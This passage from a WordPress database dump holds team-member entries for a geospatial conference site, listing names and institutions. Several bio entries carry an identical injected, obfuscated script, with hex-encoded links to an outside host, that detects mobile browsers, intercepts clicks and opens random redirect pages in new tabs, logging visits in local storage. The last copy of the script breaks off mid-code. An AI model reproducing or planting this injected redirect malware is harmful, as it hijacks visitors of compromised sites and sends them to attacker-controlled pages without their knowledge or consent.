20:06:45','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2972',0,'dt_team','',0),
(2973,1,'2022-11-04 20:06:08','2022-11-04 20:06:08','','ws181','','inherit','open','closed','','ws181','','','2022-11-04 20:06:08','2022-11-04 20:06:08','',2972,'https://gsw2023.com/wp-content/uploads/2022/11/ws181.jpg',0,'attachment','image/jpeg',0),
(2974,1,'2022-11-04 20:08:22','2022-11-04 20:08:22','<!-- wp:paragraph -->\n<p>Karlsruhe Institute of Technology, GERMANY (WG IV/4)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Martin Breunig</strong>','','publish','open','closed','','martin-breunig','','','2022-11-04 20:08:24','2022-11-04 20:08:24','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2974',0,'dt_team','',0),
(2975,1,'2022-11-04 20:07:57','2022-11-04 20:07:57','','ws182','','inherit','open','closed','','ws182','','','2022-11-04 20:07:57','2022-11-04 20:07:57','',2974,'https://gsw2023.com/wp-content/uploads/2022/11/ws182.jpg',0,'attachment','image/jpeg',0),
(2976,1,'2022-11-04 20:10:52','2022-11-04 20:10:52','<!-- wp:paragraph -->\n<p>Roads and Transport Authority, Dubai   </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>UNITED ARAB EMIRATES (WG IV/4)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Mulhim Al Doori','','publish','open','closed','','mulhim-al-doori','','','2022-11-04 20:10:54','2022-11-04 20:10:54','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2976',0,'dt_team','',0),
(2977,1,'2022-11-04 20:10:40','2022-11-04 20:10:40','','ws183','','inherit','open','closed','','ws183','','','2022-11-04 20:10:40','2022-11-04 20:10:40','',2976,'https://gsw2023.com/wp-content/uploads/2022/11/ws183.jpg',0,'attachment','image/jpeg',0),
(2978,1,'2022-11-04 20:13:58','2022-11-04 20:13:58','<!-- wp:paragraph -->\n<p>Karlsruhe Institute of Technology, GERMANY (WG IV/4)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3e